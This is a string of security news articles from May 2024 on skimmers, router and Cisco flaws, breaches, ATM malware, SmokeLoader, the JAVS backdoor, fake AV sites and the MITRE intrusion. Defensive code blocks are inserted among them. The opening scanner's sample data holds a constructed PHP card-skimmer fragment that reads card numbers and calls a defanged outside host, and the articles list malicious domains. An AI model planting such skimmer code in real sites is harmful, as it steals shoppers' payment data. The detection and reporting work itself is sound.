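    for label, rx in GENERIC.items():
        if rx.search(value):
            findings.append(label)
    generic_hits = [f for f in findings if not f.startswith("known_")]
    if len(generic_hits) < len(findings):
        verdict = "malicious"          # a published IoC matched
    elif len(generic_hits) >= 2:
        verdict = "suspicious"         # several skimmer traits, no known IoC
    else:
        verdict = "clean"
    return {"option": name, "verdict": verdict, "findings": findings}


def scan_options(rows) -> list[dict]:
    """rows: iterable of (option_name, option_value) pairs exported from wp_options."""
    return [assess_option(name, value) for name, value in rows]


# Constructed sample rows; the third is a made-up fragment, not the real skimmer.
MALICIOUS_SNIPPET = """<?php
function twentytwenty_get_post_logos() {
    echo '<input type="text" name="cc_number" autocomplete="off">';
}
add_action('woocommerce_placeholder_hook', 'twentytwenty_get_post_logos');
if (isset($_POST['cc_number'])) {
    $ch = curl_init('hxxps://2of[.]cc/wp-content/');
}
"""
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    (SNIPPET_OPTION, "<?php add_action('wp_footer', function () { echo '<p>Thanks</p>'; });"),
    (SNIPPET_OPTION, MALICIOUS_SNIPPET),
]

if __name__ == "__main__":
    for result in scan_options(SAMPLE_ROWS):
        print(result["option"], result["verdict"], result["findings"])
```

Any snippet plugin that stores executable PHP in the database deserves the same review: the option name differs per plugin, but the traits that matter (hooking the checkout, disabling autocomplete, reading POST data, calling out) do not.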

“In essence, ecommerce sites are prime targets for hackers due to the valuable data they handle.” concludes the report. “Here’s a simple guide to protect your online store:

  1. Keep your software patched: Regularly update your CMS, plugins, themes, and any third-party components to patch vulnerabilities.
  2. Use strong passwords: Ensure all accounts, including admin, sFTP, and database credentials, have strong and unique passwords.
  3. Select trusted scripts: Only integrate third-party JavaScript from reputable sources. Avoid unnecessary third-party scripts.
  4. Monitor for threats: Regularly check your site for signs of malware, unauthorized changes, or any indicators of compromise.
  5. Implement a firewall: Use a web application firewall to block malicious bots, virtually patch known vulnerabilities, and filter harmful traffic.
  6. Set up a CSP: Establish a Content Security Policy (CSP) to protect against clickjacking, cross-site scripting (XSS), and other threats.”

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

TP-Link Archer C5400X gaming router is affected by a critical flaw

28 May 2024 at 06:23

Researchers warn of a critical remote code execution vulnerability in TP-Link Archer C5400X gaming router.

Researchers at OneKey discovered a critical remote code execution (RCE) vulnerability, tracked as CVE-2024-5035 (CVSS score 10.0), in the TP-Link Archer C5400X gaming router.

A remote, unauthenticated attacker can exploit the vulnerability to execute commands on the device.

The TP-Link Archer C5400X is a high-performance gaming router designed for demanding applications such as online gaming and streaming.

The vulnerability resides in a binary called “rftest” that is executed during device startup. The researchers discovered that the binary exposes a network service that is susceptible to unauthenticated command injection and buffer overflows on TCP ports 8888, 8889, and 8890.

“By successfully exploiting this flaw, a remote unauthenticated attacker can gain arbitrary command execution on the device with elevated privileges.” reads the report published by OneKey. “It’s unclear whether the binary is always launched and whether it is always exposed on LAN/WAN interfaces. We reproduced the issue within an emulator, but production devices may behave differently. We put our trust in TP-Link in assessing the actual exposure of this vulnerability.”

The experts noticed that upon executing the binary, it starts a TCP server on port 8888, accepting commands from clients. The binary only accepts commands starting with “wl” or “nvram get”. However, this limitation can be bypassed for command injection by appending shell meta-characters like “;”, “&”, or “|”.

TP-Link Archer C5400X

TP-Link addressed the issue by discarding any command containing shell meta-characters.

The issue affects firmware versions through 1.1.1.6; version Archer C5400X(EU)_V1_1.1.7 Build 20240510 addresses the flaw.

Below is the timeline for this flaw:

  • 2024-02-16 – Report submitted to TP-Link PSIRT through encrypted email.
  • 2024-02-19 – Case opened by TP-Link PSIRT.
  • 2024-04-10 – TP-Link shares a beta version of 1.1.7p1 for validation.
  • 2024-04-17 – Patch confirmed by ONEKEY.
  • 2024-05-27 – Release of the ONEKEY advisory in coordination with TP-Link.

Pierluigi Paganini

(SecurityAffairs – hacking, TP-Link Archer C5400X)

Sav-Rx data breach impacted over 2.8 million individuals

27 May 2024 at 20:51

Prescription service firm Sav-Rx disclosed a data breach that potentially impacted over 2.8 million people in the United States.

Prescription service company Sav-Rx disclosed a data breach following a 2023 cyberattack. The company is notifying 2,812,336 individuals in the United States impacted by the security breach.

A&A Services, which operates as Sav-RX, shared with the Maine Attorney General’s office the data breach notification letter sent to the impacted individuals.

The investigation conducted by the company with the help of external cybersecurity experts revealed that threat actors first gained access to the IT System on or around October 3, 2023.

“On October 8, 2023, we identified an interruption to our computer network. As a result, we immediately took steps to secure our systems and engaged third-party cybersecurity experts. Our information technology systems (“IT System”) were restored the next business day, and prescriptions were shipped on time without delay.” reads the letter sent to the impacted individuals. “As part of the investigation, we learned that an unauthorized third party was able to access certain non-clinical systems and obtained files that contained health information. After an extensive review with third-party experts, on April 30, 2024, we discovered that some of the data accessed or acquired by the unauthorized third party may have contained your protected health information.”

Compromised data includes full name, date of birth, Social Security Number (SSN), email address, physical address, phone number, eligibility data, and insurance identification number.

Sav-Rx took eight months to notify impacted individuals; the company says it delayed notification to avoid impacting patient care during its investigation.

“Our initial priority was restoring systems to minimize any interruption to patient care.” states the company. “The incident did not affect our pharmacy systems, including those systems related to our mail order pharmacy. Not all customers were impacted, and not all health plan participants were impacted.”

The company promptly notified law enforcement authorities. Sav-Rx worked with external cybersecurity experts to contain the incident and ensure any data stolen from the company was destroyed and not further disseminated.

The firm pointed out that the incident had a limited impact on its operations: its IT system was restored the next business day and there was no delay in the shipment of prescriptions.

The prescription service provider also announced it has enhanced its security protocols, controls, technology, and training.

Sav-Rx is offering impacted individuals complimentary access to 24 months of credit monitoring and identity theft restoration services provided by Equifax.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The Impact of Remote Work and Cloud Migrations on Security Perimeters

27 May 2024 at 13:08

Organizations had to re-examine the traditional business perimeter and migrate to cloud-based tools to support distributed workforces. What is the impact?

The almost overnight shift to remote work, driven by the COVID-19 pandemic, has profoundly impacted how businesses use technology. Organizations across the globe had to adapt, and adapt quickly. They had to re-examine the traditional business perimeter and migrate to cloud-based tools to support distributed workforces.

Cloud-based applications and services can be accessed from anywhere via an internet connection, facilitating seamless collaboration among remote workers. The cloud can be scaled up or down based on demand, providing the flexibility to support varying workloads and user numbers and eliminating the danger of under- or over-provisioning.

In addition, by moving to the cloud, companies can reduce the capital expenditure associated with maintaining on-premises infrastructure. Cloud-based tools such as Microsoft Teams, Slack, and Google Workspace also boost collaboration and communication among remote teams, driving productivity and innovation.

Cloud Security Challenges

However, adopting cloud computing significantly expanded the attack surface for businesses, effectively dissolving the traditional network perimeter. This shift introduced new vulnerabilities, and conventional security measures designed to protect a well-defined, centralized perimeter were no longer enough.

Enterprises typically use multiple cloud services from a wide range of vendors for business applications, development environments, and IT infrastructure management. This multi or hybrid cloud strategy can introduce unexpected complexities and challenges, which are exacerbated when different business units and teams adopt cloud solutions without the approval or knowledge of the central IT department.

Storing data in the cloud also comes with a heightened risk of data breaches. These environments house a significant amount of valuable and sensitive information, making them attractive to malicious actors. Moreover, cloud platforms store vast amounts of data in centralized repositories, and this concentration of data creates a single point of failure that, if breached, can lead to major data loss and exposure.

Cloud environments are also highly dynamic, complex, and distributed, which can obscure visibility into assets, data flows, and security postures. Furthermore, many cloud services operate on a multi-tenant model, where multiple customers share the same infrastructure. Although cloud providers implement stringent isolation mechanisms, the shared nature of the infrastructure can introduce vulnerabilities that, if exploited, can affect multiple customers.

In addition to these challenges, cloud security adds a new form of security alert for analysts to triage and investigate, adding to the overall costs. Managing cloud alerts effectively requires overcoming the unique complexities introduced by cloud architectures. The sheer volume of alerts generated by various cloud resources can easily overwhelm security teams. Each cloud service has its own set of security and audit logs, which often provide data in non-standard formats, adding to the complexity of monitoring and analysis.

Furthermore, the lack of clear visibility across different cloud platforms and services can hinder effective response strategies, as security teams struggle to correlate alerts across a fragmented ecosystem. This situation demands robust automation and integration of security tools to ensure comprehensive coverage and swift response to potential threats in cloud environments.

Compliance Across Jurisdictions

Compliance is another challenge. Ensuring compliance with industry regulations and standards in a cloud environment can be complex. Different industries and regions have specific regulatory requirements, such as the General Data Protection Regulation (GDPR) for data protection in the EU, the Health Insurance Portability and Accountability Act (HIPAA) for healthcare information in the US, and the Payment Card Industry Data Security Standard (PCI-DSS) for credit card information. These regulations have unique requirements for data handling, security controls, and reporting.

The cloud landscape constantly evolves, with new services, features, and configurations continuously introduced. Maintaining compliance in a dynamic setting requires continuous monitoring and adaptation to ensure that all deployed services comply with regulatory standards.

Misconfigurations Exposing Data

Cloud misconfigurations are another major cause of security vulnerabilities. They often result from human error or a lack of understanding of complex cloud environments. These misconfigurations can expose sensitive data and systems to unauthorized access and breaches.

For example, setting overly permissive access controls can inadvertently expose sensitive data to the public internet or unauthorized users. This could include misconfigured storage buckets, databases, and virtual machines. Also, failure to change default security settings can leave cloud resources vulnerable to exploitation. Default settings often lack adequate security and should be customized to meet the organization’s specific security requirements.

Poor network segmentation is another culprit: once bad actors gain a foothold, it allows them to move laterally within a cloud environment. Properly segmenting networks can contain potential breaches and limit the spread of attacks.
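The first misconfiguration named in this section, an overly permissive access control on a storage bucket, is one of the few that can be checked mechanically from the policy document itself. The audit function below is an added example rather than anything from the article; it assumes the AWS S3 bucket-policy JSON format (the article names no provider), treats an Allow statement whose Principal is "*" or {"AWS": "*"} as public, sets aside statements that carry a Condition for manual review, and uses constructed weak and corrected policies with a placeholder account ID.

```python
"""Find public-access grants in an S3-style bucket policy (added example)."""
import json

# Constructed weak policy: anyone on the internet may list and read the bucket.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"],
    }],
}

# Constructed corrected policy: the same access limited to one role (placeholder account).
FIXED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ReaderRoleOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/reports-reader"},
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"],
    }],
}


def _as_list(value):
    """Policy fields may be a single string or a list; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def principals(stmt: dict) -> list[str]:
    """Flatten the Principal field into a list of principal strings."""
    principal = stmt.get("Principal", {})
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        found = []
        for entries in principal.values():
            found.extend(_as_list(entries))
        return found
    return _as_list(principal)


def audit_policy(policy: dict) -> dict:
    """Return Allow statements granted to everyone, split by whether a Condition narrows them."""
    report = {"public": [], "conditional": []}
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or "*" not in principals(stmt):
            continue
        entry = {
            "sid": stmt.get("Sid"),
            "actions": _as_list(stmt.get("Action")),
            "resources": _as_list(stmt.get("Resource")),
        }
        # A Condition (e.g. a source VPC endpoint) may legitimately scope "*";
        # that still needs a human to confirm, so it is reported separately.
        bucket = "conditional" if stmt.get("Condition") else "public"
        report[bucket].append(entry)
    return report


def audit_policy_json(text: str) -> dict:
    """Convenience wrapper for a policy document fetched as a JSON string."""
    return audit_policy(json.loads(text))


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("fixed", FIXED_POLICY)):
        print(name, audit_policy(policy))
```

The check deliberately says nothing about account-level public-access blocks or ACLs, which also govern exposure; it answers only the narrow question of whether the policy document itself hands access to everyone.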

Understanding Responsibilities

Security in the cloud operates on a shared responsibility model, where the cloud service provider and the customer have distinct security obligations. This model outlines security duties, ensuring that both parties contribute to a secure cloud environment.

Cloud service providers are typically responsible for the security of the cloud infrastructure, including physical security, network infrastructure, and the hypervisor layer. They ensure that the foundational services are secure and reliable. However, customers are responsible for securing their data, managing user access, and configuring security settings for their applications and services that run in the cloud.

Organizations must clearly understand their responsibilities within this model to implement appropriate security measures. This includes data encryption, identity and access management, regular patching, and compliance with relevant regulatory requirements. Failure to understand and act upon these responsibilities can lead to security vulnerabilities and data breaches.

A Proactive Approach

The shift to remote work and the migration to cloud-based solutions have transformed the traditional security perimeter. While these trends offer numerous benefits, they also introduce new challenges and risks.

Traditional security approaches, which rely on static defenses, are insufficient to address the evolving threat landscape in the cloud. The cloud’s dynamic and interconnected nature demands a more automated approach, where the SOC teams enforce security best practices that emphasize efficiency in threat detection using AI-enabled automation tools.

By adopting a proactive approach to security, organizations can successfully navigate this new world and ensure the secure and efficient operation of their distributed workforces.

About the Author: Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications. She is also a regular writer at Bora.

Pierluigi Paganini

(SecurityAffairs – hacking, cybersecurity)

New ATM Malware family emerged in the threat landscape

27 May 2024 at 11:20

Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.

A threat actor is advertising a new ATM malware family that is claimed to be able to compromise 99% of ATMs in Europe. The threat actor is offering the malware for $30,000; he claims that the “EU ATM Malware” was designed from scratch and that it can also target approximately 60% of ATMs worldwide.

If the claims are true, this malware poses a significant threat to the global banking industry. According to the announcement, the ATM malware can target machines manufactured by multiple leading vendors, including Diebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, and Hitachi.

ATM malware

“The developers of this malware claim that it can generate up to $30,000 per ATM, making it a lucrative tool for cybercriminals.” reported the website DailyDarkweb. “The malware is fully automated, simplifying its deployment and operation.”

The malware is fully automated, making its deployment and operation straightforward and efficient; however, it also supports a manual operation mode.

The seller is offering the malware with multiple payment options, including a monthly subscription and an initial fee plus a share of the profits from successful jackpotting operations.

The threat actors also give customers a test payload option valid for three days.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

A high-severity vulnerability affects Cisco Firepower Management Center

27 May 2024 at 06:58

Cisco addressed a SQL injection vulnerability in the web-based management interface of the Firepower Management Center (FMC) Software.

Cisco addressed a vulnerability, tracked as CVE-2024-20360 (CVSS score 8.8), in the web-based management interface of the Firepower Management Center (FMC) Software.

The vulnerability is a SQL injection issue; an attacker can exploit the flaw to obtain any data from the database, execute arbitrary commands on the underlying operating system, and elevate privileges to root. The attacker can exploit this vulnerability only if they have at least Read Only user credentials.

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.” reads the advisory. “This vulnerability exists because the web-based management interface does not adequately validate user input. An attacker could exploit this vulnerability by authenticating to the application and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to obtain any data from the database, execute arbitrary commands on the underlying operating system, and elevate privileges to root. To exploit this vulnerability, an attacker would need at least Read Only user credentials.”

Cisco states that there are no workarounds that address this vulnerability. The IT giant has confirmed that this vulnerability does not affect Adaptive Security Appliance (ASA) Software or Firepower Threat Defense (FTD) Software.

The Cisco Product Security Incident Response Team (PSIRT) is not aware of attacks in the wild exploiting this vulnerability.

Pierluigi Paganini

(SecurityAffairs – hacking, SQL Injection)

CERT-UA warns of malware campaign conducted by threat actor UAC-0006

26 May 2024 at 16:45

The Ukraine CERT-UA warns of a concerning increase in cyberattacks attributed to the financially-motivated threat actor UAC-0006.

The Computer Emergency Response Team of Ukraine (CERT-UA) warned of a surge in cyberattacks linked to the financially-motivated threat actor UAC-0006.

UAC-0006 has been active since at least 2013. The threat actors focus on compromising accountants’ PCs (which are used to support financial activities, such as access to remote banking systems), stealing credentials, and making unauthorized fund transfers.

The government experts reported that since May 20 the group has carried out at least two massive campaigns aimed at distributing the SmokeLoader malware via email.

SmokeLoader acts as a loader for other malware: once executed, it injects malicious code into the running Explorer process (explorer.exe) and downloads another payload to the system.

“Starting from May 20th, hackers have launched at least two massive campaigns with emails containing the SmokeLoader malware.” reads the advisory published by CERT-UA.

The attackers sent out emails with ZIP archives containing IMG files that serve as decoys for hidden EXE malware and ACCDB documents. The documents are weaponized Microsoft Access files; once the malicious macros are enabled, they execute PowerShell commands to download and run EXE files.

The researchers observed that following the initial infection, additional malware such as TALESHOT and RMS are downloaded onto the targeted PC.

The UAC-0006 actor is using a botnet composed of several hundred infected machines.

“Currently, UAC-0006’s bot network consists of several hundred infected machines. CERT-UA believes that hackers may soon activate fraudulent schemes using remote banking systems.” continues the report.

CERT-UA warned Ukrainian CEOs to enhance cybersecurity measures for accountants’ automated workplaces. It shared indicators of compromise for this campaign and urges organizations to implement proper security policies and protection mechanisms.

In May 2023, Ukraine’s CERT-UA warned of another phishing campaign aimed at distributing the SmokeLoader malware in the form of a polyglot file.

UAC-0006 is the most active financially-motivated threat actor targeting Ukrainian businesses; it already attempted to steal tens of millions of hryvnias through mass online theft campaigns between August and October 2023.

CERT-UA published an article that provides more details of the group’s TTPs.

Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

Security Affairs newsletter Round 473 by Pierluigi Paganini – INTERNATIONAL EDITION

26 May 2024 at 12:08

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Fake AV websites used to distribute info-stealer malware
MITRE December 2023 attack: Threat actors created rogue VMs to evade detection
An XSS flaw in GitLab allows attackers to take over accounts
Google fixes eighth actively exploited Chrome zero-day this year, the third in a month
Usage of TLS in DDNS Services leads to Information Disclosure in Multiple Vendors
Recall feature in Microsoft Copilot+ PCs raises privacy and security concerns
APT41: The threat of KeyPlug against Italian industries
Critical SQL Injection flaws impact Ivanti Endpoint Manager (EPM)
Chinese actor ‘Unfading Sea Haze’ remained undetected for five years
A consumer-grade spyware app found in check-in systems of 3 US hotels
Critical Veeam Backup Enterprise Manager authentication bypass bug
An ongoing malware campaign exploits Microsoft Exchange Server flaws
Critical GitHub Enterprise Server Authentication Bypass bug. Fix it now!
OmniVision disclosed a data breach after the 2023 Cactus ransomware attack
CISA adds NextGen Healthcare Mirth Connect flaw to its Known Exploited Vulnerabilities catalog
Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors
Experts warn of a flaw in Fluent Bit utility that is used by major cloud platforms and firms
Experts released PoC exploit code for RCE in QNAP QTS
GitCaught campaign relies on Github and Filezilla to deliver multiple malware
Two students uncovered a flaw that allows to use laundry machines for free
Grandoreiro Banking Trojan is back and targets banks worldwide
Healthcare firm WebTPA data breach impacted 2.5 million individuals
North Korea-linked Kimsuky used a new Linux backdoor in recent attacks

International Press – Newsletter

Cybercrime

Healthcare company WebTPA discloses breach affecting 2.5 million people

Cybercriminals Are Targeting Elections In India With Influence Campaigns

Laundering cash from healthcare, romance scams lands US man in prison for a decade

He Trained Cops to Fight Crypto Crime—and Allegedly Ran a $100M Dark-Web Drug Market

Man behind deepfake Biden robocall indicted on felony charges, faces $6M fine

Dark Web Profile: Dispossessor Ransomware

Malware

Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns

GitCaught: Threat Actor Leverages GitHub Repository for Malicious Infrastructure

Spyware found on US hotel check-in computers

A Catalog of Hazardous AV Sites – A Tale of Malware Hosting

CVE-2024-4978: Backdoored Justice AV Solutions Viewer Software Used in Apparent Supply Chain Attack

Malware Transmutation! – Unveiling the Hidden Traces of BloodAlchemy

Hacking

Two Santa Cruz students uncover security bug that could let millions do their laundry for free

QNAP QTS zero-day in Share feature gets public RCE exploit

Linguistic Lumberjack: Attacking Cloud Services via Logging Endpoints (Fluent Bit – CVE-2024-4323)

Positive Technologies detects a series of attacks via Microsoft Exchange Server

Usage of TLS in DDNS Services leads to Information Disclosure in Multiple Vendors

Infiltrating Defenses: Abusing VMware in MITRE’s Cyber Intrusion

Google fixes eighth actively exploited Chrome zero-day this year

Intelligence and Information Warfare

IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders

Russia’s New Counterspace Weapon Is in the Same Orbit as a US Satellite

Operational Monitoring and Control Of Small Arms Weapons Within the People’s Liberation Army

Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South China Sea

Putin hijacked Austria’s spy service. Now he’s going after its government

Cybersecurity

Palantir’s Military AI Tech Conference Sounds Absolutely Terrifying

UK watchdog looking into Microsoft AI taking screenshots

Wargames director Jackie Schneider on why cyber is one of ‘the most interesting scholarly puzzles’

US Looks to Create Paranoia Amongst Hackers to Fight Ransomware Gangs, but How?

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Malware-laced JAVS Viewer deploys RustDoor implant in supply chain attack

26 May 2024 at 04:11

Malicious actors compromised the JAVS Viewer installer to deliver the RustDoor malware in a supply chain attack.

Rapid7 researchers warned that threat actors added a backdoor to the installer for the Justice AV Solutions JAVS Viewer software.

The attackers were able to inject a backdoor into the JAVS Viewer v8.3.7 installer that was being distributed from JAVS’ own servers.

Justice AV Solutions (JAVS) is a U.S.-based company providing digital audio-visual recording solutions for courtroom settings and other environments, including jails, councils, and lecture rooms. The JAVS Viewer has over 10,000 installations globally. According to the researchers, the backdoor allows attackers to gain full control of infected systems. Rapid7 experts recommend re-imaging the affected systems, resetting associated credentials, and installing the latest version of JAVS Viewer (v8.3.8 or higher).

The researchers noticed that the installer JAVS Viewer Setup 8.3.7.250-1.exe was digitally signed with an unexpected Authenticode signature and included a binary called fffmpeg.exe. The binary executed encoded PowerShell scripts; Rapid7 linked fffmpeg.exe to the GateDoor/RustDoor malware, which was identified by security firm S2W.

“Both the fffmpeg.exe binary and the installer binary are signed by an Authenticode certificate issued to “Vanguard Tech Limited”. This is unexpected, as it was noted that other JAVS binaries which appear legitimate are signed by a certificate issued to “Justice AV Solutions Inc”.” reads the report published by Rapid7. “Searching VirusTotal for other files signed by “Vanguard Tech Limited” shows the following.”

“The above suggests that there may be one other version of the malicious installer (SHA1: b8e97333fc1b5cd29a71299a8f82a541cabf4d59) and one other malicious fffmpeg.exe (SHA1: b9d13055766d792abaf1d11f18c6ee7618155a0e). These binaries were first seen on the VirusTotal platform April 1, 2024.”

The researchers discovered two malicious JAVS Viewer packages on the vendor’s server; both were signed with a certificate issued on February 10.

On April 2, 2024, the X user @2RunJack2 first reported the implant being distributed by the official JAVS downloads page.

🚨Windows version of RustDoor alert!

The malware is being hosted on the official website of JAVS. The file is Viewer 8.3.7 Setup Executable – Version 8.3.7, and this file comes with a valid certificate. The Attacker has now developed a Windows version that merges with… https://t.co/Vi2sxZveGQ

— 𝓙𝓪𝓬𝓴2 (@2RunJack2) April 2, 2024

Rapid7 published Indicators of Compromise (IoC) for this attack, below is the attack timeline:

  • Feb 10, 2024: A certificate is issued for the subject Vanguard Tech Limited, which the certificate indicates is based in London.
  • Feb 21, 2024: The first of the two malicious JAVS Viewer packages is signed with the Vanguard certificate.
  • April 2, 2024: The Twitter user @2RunJack2 tweets about malware being served by the official JAVS downloads page. It’s not stated whether the vendor was notified.
  • Mar 12, 2024: The second of the two malicious JAVS Viewer packages is signed with the Vanguard certificate.
  • May 10, 2024: Rapid7 investigates a new alert in a Managed Detection and Response customer environment. The source of the infection is traced back to an installer that was downloaded from the official JAVS site. The malware file that was downloaded by the victim, the first Viewer package, is not observed to be accessible on the vendor’s download page. It’s unknown who removed the malicious package from the downloads page (i.e., the vendor or the threat actor).
  • May 12, 2024: Rapid7 discovers three additional malicious payloads being hosted on the threat actor’s C2 infrastructure over port 8000: chrome_installer.exe, firefox_updater.exe, and OneDriveStandaloneUpdater.exe.
  • May 13, 2024: Rapid7 identifies an unlinked installer file containing malware, the second Viewer package, still being served by the official vendor site. This confirms that the vendor site was the source of the initial infection.
  • May 17, 2024: Rapid7 discovers that the threat actor removed the binary OneDriveStandaloneUpdater.exe from C2 infrastructure and replaced it with a new binary, ChromeDiscovery.exe. This indicates that the threat actor is actively updating their C2 infrastructure.

Pierluigi Paganini

(SecurityAffairs – hacking, JAVS Viewer)

Fake AV websites used to distribute info-stealer malware

25 May 2024 at 21:20

Threat actors used fake AV websites masquerading as legitimate antivirus products from Avast, Bitdefender, and Malwarebytes to distribute malware.

In mid-April 2024, researchers at the Trellix Advanced Research Center spotted multiple fake AV sites used to distribute info-stealers. The malicious websites hosted malicious files such as APKs, EXEs and Inno Setup installers with spyware and stealer capabilities.

The fake websites were masquerading as legitimate antivirus products from Avast, Bitdefender, and Malwarebytes.

The sites hosting malware are avast-securedownload.com (Avast.apk), bitdefender-app.com (setup-win-x86-x64.exe.zip), malwarebytes.pro (MBSetup.rar).

Below is the list of malicious websites analyzed by the researchers:

  1. avast-securedownload[.]com: Distributes the SpyNote trojan as an Android package file (“Avast.apk”), which, once installed, requests intrusive permissions such as reading SMS messages and call logs, installing and deleting apps, taking screenshots, tracking location, and mining cryptocurrency.
  2. bitdefender-app[.]com: Distributes a ZIP archive file (“setup-win-x86-x64.exe.zip”) that was used to deploy the Lumma information stealer.
  3. malwarebytes[.]pro: Distributes a RAR archive file (“MBSetup.rar”) that was used to deploy the StealC information stealer malware.
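The three sites above all borrow a vendor's brand name without sitting under the vendor's real domain. The following is an added example, not code from the Trellix report, of a simple check a defender can run over hostnames seen in DNS or proxy logs to surface such lookalikes. The legitimate apex domains and the list of observed hostnames are assumed/constructed for the example, and the apex extraction deliberately ignores multi-label public suffixes such as co.uk.

```python
"""Added example: flag hostnames that imitate an antivirus brand but are not
under the vendor's own apex domain. Brand-to-apex mapping is assumed here."""

BRANDS = {
    # brand token -> legitimate apex domains (assumed for the example)
    "avast": {"avast.com"},
    "bitdefender": {"bitdefender.com"},
    "malwarebytes": {"malwarebytes.com"},
}

# Constructed sample of hostnames observed in logs; the three lookalikes
# are the ones named in the report above.
OBSERVED_HOSTS = [
    "avast-securedownload.com",
    "download.avast.com",
    "bitdefender-app.com",
    "www.bitdefender.com",
    "malwarebytes.pro",
    "support.malwarebytes.com",
    "example.org",
]


def apex(host):
    """Last two labels of a hostname. Simplification: public suffixes such as
    co.uk are not handled, which is acceptable for this illustration."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def brand_lookalike(host):
    """Return the brand a hostname imitates, or None when it is legitimate
    (under a known apex) or unrelated to any watched brand."""
    lowered = host.lower()
    for brand, legit_apexes in BRANDS.items():
        if brand in lowered and apex(lowered) not in legit_apexes:
            return brand
    return None


def triage(hosts=OBSERVED_HOSTS):
    """Map each suspicious hostname to the brand it imitates."""
    findings = {}
    for host in hosts:
        brand = brand_lookalike(host)
        if brand:
            findings[host] = brand
    return findings


if __name__ == "__main__":
    for host, brand in triage().items():
        print(f"{host}: imitates {brand}")
```

Substring matching on the brand token is intentionally broad; the apex allow-list is what keeps the vendor's own hosts out of the findings, so that list is the part to maintain carefully.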

The experts also discovered a malicious binary, AMCoreDat.exe, that pretends to be a legitimate Trellix binary.

The researchers did not attribute the attacks to a specific threat actor. The report also includes Indicators of Compromise (IoCs) for the attacks employing fake AV websites.

Pierluigi Paganini

(SecurityAffairs – hacking, fake AV websites)

MITRE December 2023 attack: Threat actors created rogue VMs to evade detection

25 May 2024 at 09:51

The MITRE Corporation revealed that threat actors behind the December 2023 attacks created rogue virtual machines (VMs) within its environment.

The MITRE Corporation has provided a new update about the December 2023 attack. In April 2024, MITRE disclosed a security breach in one of its research and prototyping networks. The security team at the organization promptly launched an investigation, logged out the threat actor, and engaged third-party forensics Incident Response teams to conduct independent analysis in collaboration with internal experts.

According to the MITRE Corporation, China-linked nation-state actor UNC5221 breached its systems in January 2024 by chaining two Ivanti Connect Secure zero-day vulnerabilities.

MITRE spotted the foreign nation-state threat actor probing its Networked Experimentation, Research, and Virtualization Environment (NERVE), used for research and prototyping. The organization immediately started mitigation actions which included taking NERVE offline. The investigation is still ongoing to determine the extent of information involved.

The organization notified authorities and affected parties and is working to restore operational alternatives for collaboration. 

Despite MITRE diligently following industry best practices, implementing vendor recommendations, and complying with government guidance to strengthen, update, and fortify its Ivanti system, they overlooked the lateral movement into their VMware infrastructure.

The organization said that the core enterprise network or partners’ systems were not affected by this incident.

According to the new update, threat actors exploited zero-day flaws in Ivanti Connect Secure (ICS) and created rogue virtual machines (VMs) within the organization’s VMware environment.

“The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access. They wrote and deployed a JSP web shell (BEEFLUSH) under the vCenter Server’s Tomcat server to execute a Python-based tunneling tool, facilitating SSH connections between adversary-created VMs and the ESXi hypervisor infrastructure.” reads the latest update. “By deploying rogue VMs, adversaries can evade detection by hiding their activities from centralized management interfaces like vCenter. This allows them to maintain control over compromised systems while minimizing the risk of discovery.”

The attackers deployed rogue virtual machines (VMs) to evade detection by hiding their activities from centralized management interfaces like vCenter. This tactic allows them to control the compromised systems while minimizing the risk of discovery.

On January 7, 2024, the adversary accessed VMs and deployed malicious payloads, including the BRICKSTORM backdoor and a web shell tracked as BEEFLUSH, enabling persistent access and arbitrary command execution.

The hackers relied on SSH manipulation and script execution to maintain control over the compromised systems. MITRE noted that the attackers exploited a default VMware account to list drives and create new VMs, one of which was removed on the same day. BRICKSTORM was discovered in directories with local persistence setups, communicating with designated C2 domains. BEEFLUSH interacted with internal IP addresses, executing dubious scripts and commands from the vCenter server’s /tmp directory.

In the following days, the threat actors deployed additional payloads on the target infrastructure, including the WIREFIRE (aka GIFTEDVISITOR) web shell, and the BUSHWALK web shell for data exfiltration.

The threat actors exploited a default VMware account, VPXUSER, to make API calls for enumerating drives. They bypassed detection by deploying rogue VMs directly onto hypervisors, using SFTP to write files and executing them with /bin/vmx. These operations were invisible to vCenter and the ESXi web interface. The rogue VMs included the BRICKSTORM backdoor and persistence mechanisms, configured with dual network interfaces for communication with both the Internet/C2 and core administrative subnets.

